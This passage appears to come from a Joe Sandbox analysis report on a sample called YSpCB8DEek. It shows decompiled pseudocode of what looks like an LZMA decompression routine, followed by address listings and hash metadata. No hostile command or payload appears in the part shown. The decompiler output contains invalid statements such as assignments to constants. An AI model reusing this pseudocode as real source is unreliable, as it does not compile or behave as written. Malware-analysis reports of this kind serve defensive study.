                            														 *(__ebp - 0x10) = __ecx;
                            														0x800 = 0x800 - __edi;
                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            														__ebx = __ebx + __ebx;
                            														 *__esi = __cx;
                            													}
                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                            													 *(__ebp - 0x44) = __ebx;
                            													if( *(__ebp - 0x10) >= 0x1000000) {
                            														continue;
                            													} else {
                            														goto L46;
                            													}
                            												}
                            												L54:
                            												_t173 = __ebp - 0x34;
                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                            												__eflags =  *_t173;
                            												goto L55;
                            											case 0xf:
                            												L58:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0xf;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t203 = __ebp - 0x70;
                            												 *_t203 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t203;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												L60:
                            												__eflags = __ebx - 0x100;
                            												if(__ebx >= 0x100) {
                            													L55:
                            													__al =  *(__ebp - 0x44);
                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                            													goto L56;
                            												}
                            												L61:
                            												__eax =  *(__ebp - 0x58);
                            												__edx = __ebx + __ebx;
                            												__ecx =  *(__ebp - 0x10);
                            												__esi = __edx + __eax;
                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                            												__ax =  *__esi;
                            												 *(__ebp - 0x54) = __esi;
                            												__edi = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													_t217 = __edx + 1; // 0x1
                            													__ebx = _t217;
                            													__cx = __ax >> 5;
                            													__eflags = __eax;
                            													 *__esi = __ax;
                            												} else {
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edi;
                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            													__ebx = __ebx + __ebx;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													goto L60;
                            												} else {
                            													goto L58;
                            												}
                            											case 0x10:
                            												L109:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0x10;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t365 = __ebp - 0x70;
                            												 *_t365 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t365;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												goto L111;
                            											case 0x11:
                            												L68:
                            												_t614 =  *(_t621 - 0x58);
                            												 *(_t621 - 0x84) = 0x12;
                            												while(1) {
                            													L132:
                            													 *(_t621 - 0x54) = _t614;
                            													goto L133;
                            												}
                            											case 0x12:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__eax =  *(__ebp - 0x58);
                            													 *(__ebp - 0x84) = 0x13;
                            													__esi =  *(__ebp - 0x58) + 2;
                            													while(1) {
                            														L132:
                            														 *(_t621 - 0x54) = _t614;
                            														goto L133;
                            													}
                            												}
                            												__eax =  *(__ebp - 0x4c);
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                            												__ecx =  *(__ebp - 0x58);
                            												__eax =  *(__ebp - 0x4c) << 4;
                            												__eflags = __eax;
                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                            												goto L130;
                            											case 0x13:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													_t469 = __ebp - 0x58;
                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                            													__eflags =  *_t469;
                            													 *(__ebp - 0x30) = 0x10;
                            													 *(__ebp - 0x40) = 8;
                            													L144:
                            													 *(__ebp - 0x7c) = 0x14;
                            													goto L145;
                            												}
                            												__eax =  *(__ebp - 0x4c);
                            												__ecx =  *(__ebp - 0x58);
                            												__eax =  *(__ebp - 0x4c) << 4;
                            												 *(__ebp - 0x30) = 8;
                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                            												L130:
                            												 *(__ebp - 0x58) = __eax;
                            												 *(__ebp - 0x40) = 3;
                            												goto L144;
                            											case 0x14:
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                            												__eax =  *(__ebp - 0x80);
                            												 *(_t621 - 0x88) = _t542;
                            												goto L1;
                            											case 0x15:
                            												__eax = 0;
                            												__eflags =  *(__ebp - 0x38) - 7;
                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            												__al = __al & 0x000000fd;
                            												__eax = (__eflags >= 0) - 1 + 0xb;
                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                            												goto L120;
                            											case 0x16:
                            												__eax =  *(__ebp - 0x30);
                            												__eflags = __eax - 4;
                            												if(__eax >= 4) {
                            													_push(3);
                            													_pop(__eax);
                            												}
                            												__ecx =  *(__ebp - 4);
                            												 *(__ebp - 0x40) = 6;
                            												__eax = __eax << 7;
                            												 *(__ebp - 0x7c) = 0x19;
                            												 *(__ebp - 0x58) = __eax;
                            												goto L145;
                            											case 0x17:
                            												L145:
                            												__eax =  *(__ebp - 0x40);
                            												 *(__ebp - 0x50) = 1;
                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                            												goto L149;
                            											case 0x18:
                            												L146:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0x18;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t484 = __ebp - 0x70;
                            												 *_t484 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t484;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												L148:
                            												_t487 = __ebp - 0x48;
                            												 *_t487 =  *(__ebp - 0x48) - 1;
                            												__eflags =  *_t487;
                            												L149:
                            												__eflags =  *(__ebp - 0x48);
                            												if( *(__ebp - 0x48) <= 0) {
                            													__ecx =  *(__ebp - 0x40);
                            													__ebx =  *(__ebp - 0x50);
                            													0 = 1;
                            													__eax = 1 << __cl;
                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                            													__eax =  *(__ebp - 0x7c);
                            													 *(__ebp - 0x44) = __ebx;
                            													while(1) {
                            														 *(_t621 - 0x88) = _t542;
                            														goto L1;
                            													}
                            												}
                            												__eax =  *(__ebp - 0x50);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            												__eax =  *(__ebp - 0x58);
                            												__esi = __edx + __eax;
                            												 *(__ebp - 0x54) = __esi;
                            												__ax =  *__esi;
                            												__edi = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													__cx = __ax >> 5;
                            													__eax = __eax - __ecx;
                            													__edx = __edx + 1;
                            													__eflags = __edx;
                            													 *__esi = __ax;
                            													 *(__ebp - 0x50) = __edx;
                            												} else {
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edi;
                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													goto L148;
                            												} else {
                            													goto L146;
                            												}
                            											case 0x19:
                            												__eflags = __ebx - 4;
                            												if(__ebx < 4) {
                            													 *(__ebp - 0x2c) = __ebx;
                            													L119:
                            													_t393 = __ebp - 0x2c;
                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                            													__eflags =  *_t393;
                            													L120:
                            													__eax =  *(__ebp - 0x2c);
                            													__eflags = __eax;
                            													if(__eax == 0) {
                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                            														goto L170;
                            													}
                            													__eflags = __eax -  *(__ebp - 0x60);
                            													if(__eax >  *(__ebp - 0x60)) {
                            														goto L171;
                            													}
                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                            													__eax =  *(__ebp - 0x30);
                            													_t400 = __ebp - 0x60;
                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                            													__eflags =  *_t400;
                            													goto L123;
                            												}
                            												__ecx = __ebx;
                            												__eax = __ebx;
                            												__ecx = __ebx >> 1;
                            												__eax = __ebx & 0x00000001;
                            												__ecx = (__ebx >> 1) - 1;
                            												__al = __al | 0x00000002;
                            												__eax = (__ebx & 0x00000001) << __cl;
                            												__eflags = __ebx - 0xe;
                            												 *(__ebp - 0x2c) = __eax;
                            												if(__ebx >= 0xe) {
                            													__ebx = 0;
                            													 *(__ebp - 0x48) = __ecx;
                            													L102:
                            													__eflags =  *(__ebp - 0x48);
                            													if( *(__ebp - 0x48) <= 0) {
                            														__eax = __eax + __ebx;
                            														 *(__ebp - 0x40) = 4;
                            														 *(__ebp - 0x2c) = __eax;
                            														__eax =  *(__ebp - 4);
                            														__eax =  *(__ebp - 4) + 0x644;
                            														__eflags = __eax;
                            														L108:
                            														__ebx = 0;
                            														 *(__ebp - 0x58) = __eax;
                            														 *(__ebp - 0x50) = 1;
                            														 *(__ebp - 0x44) = 0;
                            														 *(__ebp - 0x48) = 0;
                            														L112:
                            														__eax =  *(__ebp - 0x40);
                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                            															_t391 = __ebp - 0x2c;
                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                            															__eflags =  *_t391;
                            															goto L119;
                            														}
                            														__eax =  *(__ebp - 0x50);
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            														__eax =  *(__ebp - 0x58);
                            														__esi = __edi + __eax;
                            														 *(__ebp - 0x54) = __esi;
                            														__ax =  *__esi;
                            														__ecx = __ax & 0x0000ffff;
                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                            														__eflags =  *(__ebp - 0xc) - __edx;
                            														if( *(__ebp - 0xc) >= __edx) {
                            															__ecx = 0;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                            															__ecx = 1;
                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                            															__ebx = 1;
                            															__ecx =  *(__ebp - 0x48);
                            															__ebx = 1 << __cl;
                            															__ecx = 1 << __cl;
                            															__ebx =  *(__ebp - 0x44);
                            															__ebx =  *(__ebp - 0x44) | __ecx;
                            															__cx = __ax;
                            															__cx = __ax >> 5;
                            															__eax = __eax - __ecx;
                            															__edi = __edi + 1;
                            															__eflags = __edi;
                            															 *(__ebp - 0x44) = __ebx;
                            															 *__esi = __ax;
                            															 *(__ebp - 0x50) = __edi;
                            														} else {
                            															 *(__ebp - 0x10) = __edx;
                            															0x800 = 0x800 - __ecx;
                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            															 *__esi = __dx;
                            														}
                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                            														if( *(__ebp - 0x10) >= 0x1000000) {
                            															L111:
                            															_t368 = __ebp - 0x48;
                            															 *_t368 =  *(__ebp - 0x48) + 1;
                            															__eflags =  *_t368;
                            															goto L112;
                            														} else {
                            															goto L109;
                            														}
                            													}
                            													__ecx =  *(__ebp - 0xc);
                            													__ebx = __ebx + __ebx;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            													 *(__ebp - 0x44) = __ebx;
                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                            														__ecx =  *(__ebp - 0x10);
                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            														__ebx = __ebx | 0x00000001;
                            														__eflags = __ebx;
                            														 *(__ebp - 0x44) = __ebx;
                            													}
                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                            													if( *(__ebp - 0x10) >= 0x1000000) {
                            														L101:
                            														_t338 = __ebp - 0x48;
                            														 *_t338 =  *(__ebp - 0x48) - 1;
                            														__eflags =  *_t338;
                            														goto L102;
                            													} else {
                            														goto L99;
                            													}
                            												}
                            												__edx =  *(__ebp - 4);
                            												__eax = __eax - __ebx;
                            												 *(__ebp - 0x40) = __ecx;
                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                            												goto L108;
                            											case 0x1a:
                            												L56:
                            												__eflags =  *(__ebp - 0x64);
                            												if( *(__ebp - 0x64) == 0) {
                            													 *(__ebp - 0x88) = 0x1a;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x68);
                            												__al =  *(__ebp - 0x5c);
                            												__edx =  *(__ebp - 8);
                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            												 *( *(__ebp - 0x68)) = __al;
                            												__ecx =  *(__ebp - 0x14);
                            												 *(__ecx +  *(__ebp - 8)) = __al;
                            												__eax = __ecx + 1;
                            												__edx = 0;
                            												_t192 = __eax %  *(__ebp - 0x74);
                            												__eax = __eax /  *(__ebp - 0x74);
                            												__edx = _t192;
                            												goto L79;
                            											case 0x1b:
                            												L75:
                            												__eflags =  *(__ebp - 0x64);
                            												if( *(__ebp - 0x64) == 0) {
                            													 *(__ebp - 0x88) = 0x1b;
                            													goto L170;
                            												}
                            												__eax =  *(__ebp - 0x14);
                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            												__eflags = __eax -  *(__ebp - 0x74);
                            												if(__eax >=  *(__ebp - 0x74)) {
                            													__eax = __eax +  *(__ebp - 0x74);
                            													__eflags = __eax;
                            												}
                            												__edx =  *(__ebp - 8);
                            												__cl =  *(__eax + __edx);
                            												__eax =  *(__ebp - 0x14);
                            												 *(__ebp - 0x5c) = __cl;
                            												 *(__eax + __edx) = __cl;
                            												__eax = __eax + 1;
                            												__edx = 0;
                            												_t274 = __eax %  *(__ebp - 0x74);
                            												__eax = __eax /  *(__ebp - 0x74);
                            												__edx = _t274;
                            												__eax =  *(__ebp - 0x68);
                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            												_t283 = __ebp - 0x64;
                            												 *_t283 =  *(__ebp - 0x64) - 1;
                            												__eflags =  *_t283;
                            												 *( *(__ebp - 0x68)) = __cl;
                            												L79:
                            												 *(__ebp - 0x14) = __edx;
                            												goto L80;
                            											case 0x1c:
                            												while(1) {
                            													L123:
                            													__eflags =  *(__ebp - 0x64);
                            													if( *(__ebp - 0x64) == 0) {
                            														break;
                            													}
                            													__eax =  *(__ebp - 0x14);
                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            													__eflags = __eax -  *(__ebp - 0x74);
                            													if(__eax >=  *(__ebp - 0x74)) {
                            														__eax = __eax +  *(__ebp - 0x74);
                            														__eflags = __eax;
                            													}
                            													__edx =  *(__ebp - 8);
                            													__cl =  *(__eax + __edx);
                            													__eax =  *(__ebp - 0x14);
                            													 *(__ebp - 0x5c) = __cl;
                            													 *(__eax + __edx) = __cl;
                            													__eax = __eax + 1;
                            													__edx = 0;
                            													_t414 = __eax %  *(__ebp - 0x74);
                            													__eax = __eax /  *(__ebp - 0x74);
                            													__edx = _t414;
                            													__eax =  *(__ebp - 0x68);
                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            													__eflags =  *(__ebp - 0x30);
                            													 *( *(__ebp - 0x68)) = __cl;
                            													 *(__ebp - 0x14) = _t414;
                            													if( *(__ebp - 0x30) > 0) {
                            														continue;
                            													} else {
                            														L80:
                            														 *(__ebp - 0x88) = 2;
                            														goto L1;
                            													}
                            												}
                            												 *(__ebp - 0x88) = 0x1c;
                            												goto L170;
                            										}
                            									}
                            									L171:
                            									_t544 = _t543 | 0xffffffff;
                            									goto L172;
                            								}
                            							}
                            						}
                            					}
                            					goto L1;
                            				}
                            			}














                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004073ce
                            0x004073cb
                            0x00000000
                            0x00407002

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E0040711C() {
                            				unsigned short _t531;
                            				signed int _t532;
                            				void _t533;
                            				signed int _t534;
                            				signed int _t535;
                            				signed int _t565;
                            				signed int _t568;
                            				signed int _t589;
                            				signed int* _t606;
                            				void* _t613;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					if( *(_t613 - 0x40) != 0) {
                            						 *(_t613 - 0x84) = 0xb;
                            						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                            						goto L132;
                            					} else {
                            						__eax =  *(__ebp - 0x28);
                            						L88:
                            						 *(__ebp - 0x2c) = __eax;
                            						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            						L89:
                            						__eax =  *(__ebp - 4);
                            						 *(__ebp - 0x80) = 0x15;
                            						__eax =  *(__ebp - 4) + 0xa68;
                            						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                            						L69:
                            						 *(__ebp - 0x84) = 0x12;
                            						while(1) {
                            							L132:
                            							 *(_t613 - 0x54) = _t606;
                            							while(1) {
                            								L133:
                            								_t531 =  *_t606;
                            								_t589 = _t531 & 0x0000ffff;
                            								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                            								if( *(_t613 - 0xc) >= _t565) {
                            									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                            									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                            									 *(_t613 - 0x40) = 1;
                            									_t532 = _t531 - (_t531 >> 5);
                            									 *_t606 = _t532;
                            								} else {
                            									 *(_t613 - 0x10) = _t565;
                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                            									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                            								}
                            								if( *(_t613 - 0x10) >= 0x1000000) {
                            									goto L139;
                            								}
                            								L137:
                            								if( *(_t613 - 0x6c) == 0) {
                            									 *(_t613 - 0x88) = 5;
                            									L170:
                            									_t568 = 0x22;
                            									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                            									_t535 = 0;
                            									L172:
                            									return _t535;
                            								}
                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                            								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                            								L139:
                            								_t533 =  *(_t613 - 0x84);
                            								while(1) {
                            									 *(_t613 - 0x88) = _t533;
                            									while(1) {
                            										L1:
                            										_t534 =  *(_t613 - 0x88);
                            										if(_t534 > 0x1c) {
                            											break;
                            										}
                            										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                            											case 0:
                            												if( *(_t613 - 0x6c) == 0) {
                            													goto L170;
                            												}
                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            												_t534 =  *( *(_t613 - 0x70));
                            												if(_t534 > 0xe1) {
                            													goto L171;
                            												}
                            												_t538 = _t534 & 0x000000ff;
                            												_push(0x2d);
                            												asm("cdq");
                            												_pop(_t570);
                            												_push(9);
                            												_pop(_t571);
                            												_t609 = _t538 / _t570;
                            												_t540 = _t538 % _t570 & 0x000000ff;
                            												asm("cdq");
                            												_t604 = _t540 % _t571 & 0x000000ff;
                            												 *(_t613 - 0x3c) = _t604;
                            												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                            												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                            												_t612 = (0x300 << _t604 + _t609) + 0x736;
                            												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                            													L10:
                            													if(_t612 == 0) {
                            														L12:
                            														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                            														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                            														goto L15;
                            													} else {
                            														goto L11;
                            													}
                            													do {
                            														L11:
                            														_t612 = _t612 - 1;
                            														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                            													} while (_t612 != 0);
                            													goto L12;
                            												}
                            												if( *(_t613 - 4) != 0) {
                            													GlobalFree( *(_t613 - 4));
                            												}
                            												_t534 = GlobalAlloc(0x40, 0x600); // executed
                            												 *(_t613 - 4) = _t534;
                            												if(_t534 == 0) {
                            													goto L171;
                            												} else {
                            													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                            													goto L10;
                            												}
                            											case 1:
                            												L13:
                            												__eflags =  *(_t613 - 0x6c);
                            												if( *(_t613 - 0x6c) == 0) {
                            													 *(_t613 - 0x88) = 1;
                            													goto L170;
                            												}
                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            												_t45 = _t613 - 0x48;
                            												 *_t45 =  *(_t613 - 0x48) + 1;
                            												__eflags =  *_t45;
                            												L15:
                            												if( *(_t613 - 0x48) < 4) {
                            													goto L13;
                            												}
                            												_t546 =  *(_t613 - 0x40);
                            												if(_t546 ==  *(_t613 - 0x74)) {
                            													L20:
                            													 *(_t613 - 0x48) = 5;
                            													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                            													goto L23;
                            												}
                            												 *(_t613 - 0x74) = _t546;
                            												if( *(_t613 - 8) != 0) {
                            													GlobalFree( *(_t613 - 8));
                            												}
                            												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                            												 *(_t613 - 8) = _t534;
                            												if(_t534 == 0) {
                            													goto L171;
                            												} else {
                            													goto L20;
                            												}
                            											case 2:
